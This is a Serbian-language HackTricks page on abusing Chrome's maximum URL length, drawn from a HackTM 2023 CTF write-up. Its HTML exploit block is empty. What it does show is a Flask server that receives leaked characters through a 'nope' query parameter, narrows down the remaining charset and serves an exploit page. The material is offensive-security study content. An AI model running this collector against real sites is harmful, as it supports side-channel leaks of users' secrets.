# URL Maksimalna Dužina - Klijentska Strana {% hint style="success" %} Učite i vežbajte AWS Hacking:

[**HackTricks Obuka AWS Red Tim Ekspert (ARTE)**](https://training.hacktricks.xyz/courses/arte)

\ Učite i vežbajte GCP Hacking:

[**HackTricks Obuka GCP Red Tim Ekspert (GRTE)**

](https://training.hacktricks.xyz/courses/grte)

Podržite HackTricks

* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! * **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili **pratite** nas na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Podelite hakerske trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.

{% endhint %} Kod sa [https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit) ```html ``` Server side: ```python from flask import Flask, request app = Flask(__name__) CHARSET = "abcdefghijklmnopqrstuvwxyz-_0123456789" chars = [] @app.route('/', methods=['GET']) def index(): global chars nope = request.args.get('nope', '') if nope: chars.append(nope) remaining = [c for c in CHARSET if c not in chars] print("Remaining: {}".format(remaining)) return "OK" @app.route('/exploit.html', methods=['GET']) def exploit(): return open('exploit.html', 'r').read() if __name__ == '__main__': app.run(host='0.0.0.0', port=1337) ``` {% hint style="success" %} Učite i vežbajte AWS Hacking:

[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)

\ Učite i vežbajte GCP Hacking:

[**HackTricks Training GCP Red Team Expert (GRTE)**

](https://training.hacktricks.xyz/courses/grte)

Podržite HackTricks

{% endhint %}